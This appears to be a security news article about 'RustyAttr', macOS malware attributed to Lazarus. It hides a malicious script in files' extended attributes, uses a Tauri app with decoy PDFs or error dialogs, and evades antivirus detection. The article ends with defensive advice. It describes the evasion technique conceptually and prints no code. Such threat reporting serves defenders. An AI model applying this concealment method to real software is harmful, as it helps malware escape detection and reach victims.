Hackers Leveraging Extended Attributes To Evade Detection In macOS Systems

Researchers discovered a novel approach employed by the threat actor to conceal codes using Extended Attributes to avoid detection in macOS devices.

Extended attributes are metadata that can be linked to different file systems’ files and directories. They let users retain more details about a file than just the typical attributes, such as permissions, timestamps, and file size.

The most similar method discovered while investigating malware leveraging extended attributes was in 2020, when Bundlore adware concealed its payload in resource forks and was accessed by the unique path `filename/..namedfork/rsrc`. 

The samples are attributed to APT Lazarus with a medium degree of confidence, according to Group-IB experts. Since they have only seen a small number of samples in the wild, researchers are unable to confirm that there were any victims of this incidence. 

Free Ultimate Continuous Security Monitoring Guide - Download Here (PDF)

Overview Of Execution Flow

The malware that was found was termed “RustyAttr,” and it was developed by Lazarus utilizing the Tauri framework. 

In several file systems, files and directories can be linked to metadata called Extended Attributes (EAs). Although the Finder and Terminal do not display these directly, we can easily extract and view the attributes by using `xattr`. 

Researchers say an extended attribute of custom type “test” has been defined by the threat actor.

Tauri is a framework for creating web-based, lightweight desktop apps. It enables programmers to use Rust for the backend and web frontend (HTML, CSS, and JavaScript) to create applications.

In the extended attributes, the malicious script will be retrieved and executed by the application.

Two categories of decoys were identified by the researchers. The first kind of decoy really retrieves a PDF file from filedn[.]com, a file hosting service. 

The “Investment Decision-Making Questionnaire” contains questions about game project development and funding. The second decoy only shows a dialog box with the words, “This app does not support this version.”

When the Tauri application runs, it tries to use a WebView to render an HTML webpage. A random template that was downloaded from the internet was used by the TA.

But researchers saw that another dubious piece of javascript called “preload.js” was loaded on these pages.

The ‘invoke’ function in Tauri is an Application Programming Interface (API) that promotes communication between the frontend (JavaScript) and backend (Rust), allowing the frontend to call Rust functions, send arguments, and receive data.

“At the time of our analysis, the files are fully undetected on VirusTotal, likely due to the fact that the malicious components are concealed within the attributes”, researchers said.

Recommendation

• Keep an eye out for requests to download, open, or execute files.
• Never turn off macOS Gatekeeper or permit apps from unknown developers.
• You need to be vigilant all the time to keep the company safe.

Analyze Unlimited Phishing & Malware with ANY.RUN For Free - 14 Days Free Trial.